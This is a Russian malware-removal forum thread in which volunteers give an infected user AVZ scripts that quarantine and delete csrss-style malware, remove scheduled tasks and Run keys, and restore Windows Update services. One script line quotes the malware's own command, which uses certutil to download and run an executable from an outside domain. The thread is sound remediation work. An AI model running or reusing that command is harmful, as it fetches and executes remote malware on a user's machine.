auntmary Опубликовано 22 октября, 2020 Share Опубликовано 22 октября, 2020 После скачивания программы с сомнительного ресурса (моя вина), обнаружилась гора вредоносного ПО на ноутбуке, баннеры, расширения браузера и тд., всё это я успешно почистила вручную и завершила дело сканированием с помощью Dr.Web Cureit, который нашел еще: C:\Windows\windefender.exe C:\Windows\System32\drivers\WinmonFS.sys C:\Windows\System32\drivers\Winmon.sys \MSTask\csrss Однако, после перезагрузки файлы не удалились и в диспетчере задач я снова вижу все эти процессы, а по указанному пути их нет. они грузят систему, самой удалить не получается. помогите от них избавиться ?♀️ CollectionLog-2020.10.22-23.17.zip Ссылка на комментарий Поделиться на другие сайты More sharing options...
regist Опубликовано 22 октября, 2020 Share Опубликовано 22 октября, 2020 (изменено) Трассировку маршрутов сами прописывали? Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Выполните скрипт в АВЗ (Файл - Выполнить скрипт): {Исправление в службах в реестре, значения ImagePath. Данный скрипт распространяется свободно и может быть модицифирован по согласованию с авторами - представителями SafeZone.cc При публикации скрипта данный комментарий и ссылка на VirusNet.Info обязателена. } var DescriptionTextWuauServ, DispayNameTextWuauServ, DescriptionTextBITS: String; DispayNameTextBITS, FullPathSystem32, NameFolderSystem32, FileServiceDll: String; ImagePathStr, RootStr, SubRootStr, LangID: string; AllRoots, AllKeys, RootsRestored, KeysRestored, KeysFixed: integer; FinishMsg, RestoreMsg, FixMsg, CheckMsg: String; RegSectMsg, ParamMsg, ParamValueMsg, InRegSectMsg, CorrectMsg, RestMsg: String; procedure CheckAndRestoreSection(Root: String); begin Inc(AllRoots); if RegKeyExistsEx('HKLM', Root) then RegKeyResetSecurity('HKLM', Root) else begin Inc(RootsRestored); RegKeyCreate('HKLM', Root); AddToLog(RegSectMsg + Root + RestMsg); end; end; procedure CheckAndRestoreSubSection; begin CheckAndRestoreSection(SubRootStr); end; procedure RestoredMsg(Root, Param: String); begin AddToLog(ParamMsg + Param + InRegSectMsg + Root + RestMsg); Inc(KeysRestored); end; procedure FixedMsg(Root, Param: String); begin AddToLog(ParamValueMsg + Param + InRegSectMsg + Root + CorrectMsg); Inc(KeysFixed); end; procedure RestoreStrParam(Root, Param, Value: String); begin RegKeyStrParamWrite('HKLM', Root, Param, Value); RestoredMsg(Root, Param); end; procedure CheckAndRestoreStrParam(Root, Param, Value: String); begin Inc(AllKeys); if not RegKeyParamExists('HKLM', Root, Param) then RestoreStrParam(Root, Param, Value); end; procedure CheckAndRestoreIntParam(Root, Param: String; Value: Integer); begin Inc(AllKeys); if not RegKeyParamExists('HKLM', Root, Param) then begin RegKeyIntParamWrite('HKLM', Root, Param, Value); RestoredMsg(Root, Param); end; end; procedure CheckAndRestoreMultiSZParam(Param, Value: String); begin Inc(AllKeys); if not RegKeyParamExists('HKLM', RootStr, Param) then begin ExecuteFile('REG ADD HKLM\' + RootStr + ' /v ' + Param + Value, '', 0, 10000, true); RestoredMsg(RootStr, Param); end; end; // Исправление значения параметра ImagePath для служб 'wuauserv' и 'BITS' procedure ImagePathFix(Node, Srv: String); var RegStr: String; begin RegStr := 'SYSTEM\' + Node + '\Services\' + Srv; if RegKeyExistsEx('HKLM', RegStr) then begin Inc(AllKeys); RegKeyResetSecurity('HKLM', RegStr); RegKeyStrParamWrite('HKLM', RegStr, 'ImagePath', ImagePathStr); FixedMsg(RegStr, 'ImagePath'); end; end; { Выполнение исправление всех ключей в ветках - 'HKLM\SYSTEM\CurrentControlSet\Services\BITS' и 'HKLM\SYSTEM\CurrentControlSet\Services\wuauserv'} procedure CorrectRegistryRoot(DescriptionText, DisplayNameText, Srv: String); var FileServiceDll, CCSNumber: string; i : integer; begin if Srv = 'BITS' then FileServiceDll := FullPathSystem32 + 'qmgr.dll' else FileServiceDll := FullPathSystem32 + 'wuauserv.dll'; RootStr:= 'SYSTEM\CurrentControlSet\Services\' + Srv; CheckAndRestoreSection(RootStr); CheckAndRestoreStrParam(RootStr, 'Description', DescriptionText); CheckAndRestoreStrParam(RootStr, 'DisplayName', DisplayNameText); CheckAndRestoreStrParam(RootStr, 'ObjectName', 'LocalSystem'); Inc(AllKeys); if not RegKeyParamExists('HKLM', RootStr, 'ImagePath') then RestoreStrParam(RootStr, 'ImagePath', ImagePathStr) else begin Dec(AllKeys); if LowerCase(RegKeyStrParamRead('HKLM', RootStr, 'ImagePath')) <> LowerCase(ImagePathStr) then for i:= 0 to 999 do begin if i > 0 then CCSNumber := FormatFloat('ControlSet000', i) else CCSNumber := 'CurrentControlSet'; ImagePathFix(CCSNumber, Srv); end; end; CheckAndRestoreIntParam(RootStr, 'ErrorControl', 1); CheckAndRestoreIntParam(RootStr, 'Start', 2); CheckAndRestoreIntParam(RootStr, 'Type', 32); if Srv = 'BITS' then begin CheckAndRestoreMultiSZParam('DependOnService', ' /t REG_MULTI_SZ /d RpcSs'); CheckAndRestoreMultiSZParam('DependOnGroup', ' /t REG_MULTI_SZ'); end; SubRootStr:= RootStr + '\Enum'; CheckAndRestoreSubSection; CheckAndRestoreStrParam(SubRootStr, '0', 'Root\LEGACY_' + UpperCase(Srv) + '\0000'); CheckAndRestoreIntParam(SubRootStr, 'Count', 1); CheckAndRestoreIntParam(SubRootStr, 'NextInstance', 1); SubRootStr := RootStr + '\Security'; CheckAndRestoreSubSection; Inc(AllKeys); if not RegKeyParamExists('HKLM', SubRootStr, 'Security') then begin RegKeyBinParamWrite('HKLM', SubRootStr, 'Security', '01,00,14,80,78,00,00,00,84,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,00,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,48,00,03,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00'); RestoredMsg(SubRootStr, 'Security'); end; SubRootStr:= RootStr + '\Parameters'; CheckAndRestoreSubSection; Inc(AllKeys); if not RegKeyParamExists('HKLM', SubRootStr, 'ServiceDll') then begin RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll); RestoredMsg(SubRootStr, 'ServiceDll'); end else if LowerCase(RegKeyStrParamRead('HKLM', SubRootStr, 'ServiceDll')) <> LowerCase(FileServiceDll) then begin RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll); FixedMsg(SubRootStr, 'ServiceDll'); end end; { Главное выполнение } begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); TerminateProcessByName('c:\windows\rss\csrss.exe'); TerminateProcessByName('c:\users\mistress\appdata\local\temp\csrss\u20200626.exe'); TerminateProcessByName('c:\users\mistress\appdata\local\temp\csrss\ww24.exe'); QuarantineFile('c:\windows\rss\csrss.exe', ''); QuarantineFile('c:\users\mistress\appdata\local\temp\csrss\u20200626.exe', ''); QuarantineFile('c:\users\mistress\appdata\local\temp\csrss\ww24.exe', ''); QuarantineFile('C:\Windows\Temp\kjmGSURZTYOfniSI\wyHjuFAighgBsSf\bakxgxh.exe', ''); QuarantineFile('C:\Users\mistress\AppData\Local\Temp\csrss\scheduled.exe', ''); QuarantineFile('C:\Users\mistress\appdata\local\temp\csrss\wup\xarch\wup.exe', ''); DeleteFile('c:\windows\rss\csrss.exe', ''); DeleteFile('c:\users\mistress\appdata\local\temp\csrss\u20200626.exe', ''); DeleteFile('c:\users\mistress\appdata\local\temp\csrss\ww24.exe', ''); DeleteFile('C:\Windows\rss\csrss.exe', '32'); DeleteFile('C:\Windows\rss\csrss.exe', '64'); DeleteFile('C:\Windows\Temp\kjmGSURZTYOfniSI\wyHjuFAighgBsSf\bakxgxh.exe', '32'); DeleteFile('cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\mistress\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\mistress\AppData\Local\Temp\csrss\scheduled.exe /31340', '64'); DeleteFile('C:\Users\mistress\AppData\Local\Temp\csrss\scheduled.exe', '64'); DeleteFile('C:\Windows\Temp\kjmGSURZTYOfniSI\wyHjuFAighgBsSf\bakxgxh.exe', '64'); DeleteFile('C:\Users\mistress\appdata\local\temp\csrss\scheduled.exe', ''); DeleteFile('C:\Users\mistress\appdata\local\temp\csrss\wup\xarch\wup.exe', ''); ClearLog; ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\wuauserv', 'wuauserv.reg'); ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\BITS', 'BITS.reg'); LangID:= RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Nls\Language', 'InstallLanguage'); if LangID = '0419' then begin DescriptionTextWuauServ := 'Включает загрузку и установку обновлений Windows. Если служба отключена, то на этом компьютере нельзя будет использовать возможности автоматического обновления или веб-узел Центра обновления Windows.'; DispayNameTextWuauServ := 'Автоматическое обновление'; DescriptionTextBITS := 'Обеспечивает передачу данных между клиентами и серверами в фоновом режиме. Если служба BITS отключена, такие возможности, как Windows Update, не могут правильно работать.'; DispayNameTextBITS := 'Фоновая интеллектуальная служба передачи (BITS)'; AddToLog('Операционная система - русская'); FinishMsg := '–––– Восстановление завершено ––––'; RestoreMsg := 'Восстановлено разделов\параметров: '; FixMsg := 'Исправлено параметров: '; CheckMsg := 'Проверено разделов\параметров: '; RegSectMsg := 'Раздел реестра HKLM\'; ParamMsg := 'Параметр '; ParamValueMsg := 'Значение параметра '; InRegSectMsg := ' в разделе реестра HKLM\'; CorrectMsg := ' исправлено на оригинальное.'; RestMsg := 'восстановлен.'; end else begin DescriptionTextWuauServ := 'Enables the download and installation of Windows updates. If this service is disabled, this computer will not be able to use the Automatic Updates feature or the Windows Update Web site.'; DispayNameTextWuauServ := 'Automatic Updates'; DescriptionTextBITS := 'Transfers data between clients and servers in the background. If BITS is disabled, features such as Windows Update will not work correctly.'; DispayNameTextBITS := 'Background Intelligent Transfer Service'; AddToLog('Operation system - english'); FinishMsg := '–––– Restoration finished ––––'; RestoreMsg := 'Sections\parameters restored: '; FixMsg := 'Parameters corrected: '; CheckMsg := 'Sections\parameters checked: '; RegSectMsg := 'Registry section HKLM\'; ParamMsg := 'Parameter '; ParamValueMsg := 'Value of parameter '; InRegSectMsg := ' in registry section HKLM\'; CorrectMsg := ' corrected on original.'; RestMsg := ' restored.'; end; AddToLog(''); { Определение папки X:\Windows\System32\ } NameFolderSystem32 := RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Windows', 'SystemDirectory'); ImagePathStr := NameFolderSystem32 + '\svchost.exe -k netsvcs'; Delete(NameFolderSystem32, 1, pos('\', NameFolderSystem32) - 1); FullPathSystem32 := GetEnvironmentVariable('WinDir') + NameFolderSystem32 + '\'; AllRoots := 0; AllKeys := 0; RootsRestored := 0; KeysRestored := 0; KeysFixed := 0; CorrectRegistryRoot(DescriptionTextBITS, DispayNameTextBITS, 'BITS'); CorrectRegistryRoot(DescriptionTextWuauServ, DispayNameTextWuauServ, 'wuauserv'); AddToLog(''); AddToLog(FinishMsg); AddToLog(''); AddToLog(RestoreMsg + IntToStr(RootsRestored) + ' \ ' + IntToStr(KeysRestored)); AddToLog(FixMsg + IntToStr(KeysFixed)); AddToLog(CheckMsg + IntToStr(AllRoots) + ' \ ' + IntToStr(AllKeys)); SaveLog(RegKeyStrParamRead('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders', 'Desktop') + '\Correct_wuauserv&BITS.log'); TerminateProcessByName('c:\users\mistress\appdata\local\temp\csrss\ww24.exe'); TerminateProcessByName('c:\users\mistress\appdata\roaming\b9cdde3b480f\b9cdde3b480f.exe'); TerminateProcessByName('c:\windows\rss\csrss.exe'); QuarantineFile('c:\users\mistress\appdata\local\temp\csrss\ww24.exe', ''); QuarantineFile('c:\windows\rss\csrss.exe', ''); QuarantineFile('C:\Windows\windefender.exe', ''); QuarantineFileF('c:\users\mistress\appdata\local\temp\csrss', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0); QuarantineFileF('c:\users\mistress\appdata\roaming\b9cdde3b480f', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0); DeleteFile('c:\users\mistress\appdata\local\temp\csrss\ww24.exe', '32'); DeleteFile('c:\windows\rss\csrss.exe', '32'); DeleteFile('C:\Windows\windefender.exe', '32'); DeleteFileMask('c:\users\mistress\appdata\local\temp\csrss', '*', true); DeleteFileMask('c:\users\mistress\appdata\roaming\b9cdde3b480f', '*', true); DeleteDirectory('c:\users\mistress\appdata\local\temp\csrss'); DeleteDirectory('c:\users\mistress\appdata\roaming\b9cdde3b480f'); DeleteSchedulerTask('csrss'); DeleteSchedulerTask('ScheduledUpdate'); DeleteSchedulerTask('ScheduledUpdate'); DeleteSchedulerTask('YjuvlbImHgDMaWtHI.job'); DeleteSchedulerTask('YjuvlbImHgDMaWtHI'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'BlueBird', '32'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'BlueBird', '64'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'BlueBird', 'x32'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'BlueBird', 'x64'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'CloudNet', 'x64'); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteRepair(3); ExecuteRepair(4); ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end. Компьютер перезагрузится. Полученный архив quarantine.zip из папки с распакованной утилитой AVZ на этот почтовый ящик: newvirus@kaspersky.com[ Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift". Изменено 23 октября, 2020 пользователем regist 1 Ссылка на комментарий Поделиться на другие сайты More sharing options...
auntmary Опубликовано 22 октября, 2020 Автор Share Опубликовано 22 октября, 2020 17 часов назад, regist сказал: Трассировку маршрутов сами прописывали? Доброй ночи, нет, я ничего не прописывала 17 часов назад, regist сказал: Выполните скрипт в АВЗ (Файл - Выполнить скрипт): скрипт не хочет работать или я что-то не так делаю Ошибка скрипта: ')' expected, позиция [278:2] Ошибка скрипта: Undeclared identifier: 'DeleteSchedulerTask', позиция [253:21] прошу прощения, все сработало (изначально запускала АВЗ не из автологгера) после перезагрузки всё чисто, насколько я могу сейчас судить, спасибо большое ? прикрепляю логи повторной диагностики CollectionLog-2020.10.23-00.36.zip Ссылка на комментарий Поделиться на другие сайты More sharing options...
Sandor Опубликовано 23 октября, 2020 Share Опубликовано 23 октября, 2020 После выполнения скрипта на рабочем столе должен был появится текстовый файл Correct_wuauserv&BITS.log. Прикрепите его к следующему сообщению. Ссылка на комментарий Поделиться на другие сайты More sharing options...
auntmary Опубликовано 23 октября, 2020 Автор Share Опубликовано 23 октября, 2020 8 часов назад, Sandor сказал: После выполнения скрипта на рабочем столе должен был появится текстовый файл Correct_wuauserv&BITS.log. Прикрепите его к следующему сообщению. Здравствуйте, после скрипта этот файл не появился, только quarantine.zip, который я отправила на указанный адрес Ссылка на комментарий Поделиться на другие сайты More sharing options...
regist Опубликовано 23 октября, 2020 Share Опубликовано 23 октября, 2020 23 часа назад, auntmary сказал: скрипт не хочет работать или я что-то не так делаю Ошибка скрипта: ')' expected, позиция [278:2] Поправил, попробуйте ещё раз. Ссылка на комментарий Поделиться на другие сайты More sharing options...
auntmary Опубликовано 26 октября, 2020 Автор Share Опубликовано 26 октября, 2020 23.10.2020 в 23:40, regist сказал: Поправил, попробуйте ещё раз. снова здравствуйте, только сейчас заметила последствия вируса, а именно невозможно открыть дискорд на компьютере и переустановить его так же не выходит, есть ли решение у этой проблемы? при попытке установить дискорд выдает 23.10.2020 в 08:23, Sandor сказал: После выполнения скрипта на рабочем столе должен был появится текстовый файл Correct_wuauserv&BITS.log. Прикрепите его к следующему сообщению. только сейчас заметила, что файл появился на рабочем столе второй учетной записи! Correct_wuauserv&BITS.log Ссылка на комментарий Поделиться на другие сайты More sharing options...
Sandor Опубликовано 26 октября, 2020 Share Опубликовано 26 октября, 2020 Ещё раз, пожалуйста, соберите свежий CollectionLog. Дополнительно: Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Запустить проверку") и дождитесь окончания сканирования.Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt (где x - любая цифра).Прикрепите отчет к своему следующему сообщению. Подробнее читайте в этом руководстве. Ссылка на комментарий Поделиться на другие сайты More sharing options...
regist Опубликовано 26 октября, 2020 Share Опубликовано 26 октября, 2020 22.10.2020 в 21:02, regist сказал: Полученный архив quarantine.zip из папки с распакованной утилитой AVZ на этот почтовый ящик: newvirus@kaspersky.com[ Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift". То есть заново отправьте карантин. И жду лога Автологера. 5 часов назад, auntmary сказал: файл появился на рабочем столе второй учетной записи! Он появляется в той учётной записи в которой выполняли скрипт. Логи собирать и скрипты выполнять надо в одной учётной записи, а не в разных. Ссылка на комментарий Поделиться на другие сайты More sharing options...
auntmary Опубликовано 27 октября, 2020 Автор Share Опубликовано 27 октября, 2020 26.10.2020 в 09:06, Sandor сказал: Ещё раз, пожалуйста, соберите свежий CollectionLog. Дополнительно: Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе. Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Запустить проверку") и дождитесь окончания сканирования. Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt (где x - любая цифра). Прикрепите отчет к своему следующему сообщению. Подробнее читайте в этом руководстве. все сделала, вот логи. эх снова те же вирусы ? AdwCleaner[C00].txt AdwCleaner[S00].txt 26.10.2020 в 10:45, regist сказал: То есть заново отправьте карантин. И жду лога Автологера. Он появляется в той учётной записи в которой выполняли скрипт. Логи собирать и скрипты выполнять надо в одной учётной записи, а не в разных. я все делала в своей учетной записи, просто я её когда то не совсем правильно переименовала (у меня руки не совсем из того места выросли) и логи оказались в пустой папке с прошлым именем пользователя. мне все равно стоит всё проделать заново? Ссылка на комментарий Поделиться на другие сайты More sharing options...
Sandor Опубликовано 27 октября, 2020 Share Опубликовано 27 октября, 2020 3 часа назад, auntmary сказал: всё проделать заново? Соберите повторно CollectionLog Автологером. Ссылка на комментарий Поделиться на другие сайты More sharing options...
regist Опубликовано 27 октября, 2020 Share Опубликовано 27 октября, 2020 15 часов назад, auntmary сказал: AdwCleaner[C00].txt разве кто-то просил вас удалять найденное? 15 часов назад, auntmary сказал: мне все равно стоит всё проделать заново? Надо делать только то, что просят 26.10.2020 в 07:45, regist сказал: заново отправьте карантин. И жду лога Автологера. Ссылка на комментарий Поделиться на другие сайты More sharing options...
auntmary Опубликовано 27 октября, 2020 Автор Share Опубликовано 27 октября, 2020 CollectionLog-2020.10.27-23.37.zip Ссылка на комментарий Поделиться на другие сайты More sharing options...
regist Опубликовано 28 октября, 2020 Share Опубликовано 28 октября, 2020 (изменено) 1) Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. 2) Скачайте этот архив. Запустите рег-файлы из архива и согласитесь на внесение изменений в реестр. 3) Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin ClearQuarantineEx(true); QuarantineFile('C:\Program Files (x86)\xduJFODYU\nZWnqg.dll', ''); DeleteFile('C:\Program Files (x86)\xduJFODYU\nZWnqg.dll', '64'); DeleteSchedulerTask('{7F9FD259-8224-4672-BBA9-DBA84C2F0B3A}'); DeleteSchedulerTask('lAdMHZBqUcXIeKJ'); DeleteSchedulerTask('Lenovo\Lenovo Service Bridge\S-1-5-21-3833064128-939169056-4125991240-1001'); DeleteSchedulerTask('TVT\TVSUUpdateTask_UserLogOn'); DelCLSID('OpenVPN_UserSetup'); ExecuteSysClean; ExecuteRepair(20); RebootWindows(true); end. Компьютер перезагрузится. 4) - Перетащите лог Check_Browsers_LNK.log из папки AutoLogger\CheckBrowsersLNK на утилиту ClearLNK. Отчёт о работе прикрепите. 5) Запустите снова AutoLogger, соберите и прикрепите свежие логи. Изменено 28 октября, 2020 пользователем regist Ссылка на комментарий Поделиться на другие сайты More sharing options...
auntmary Опубликовано 28 октября, 2020 Автор Share Опубликовано 28 октября, 2020 ClearLNK-2020.10.29_00.43.08.log CollectionLog-2020.10.29-00.48.zip Ссылка на комментарий Поделиться на другие сайты More sharing options...
От leqwes
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти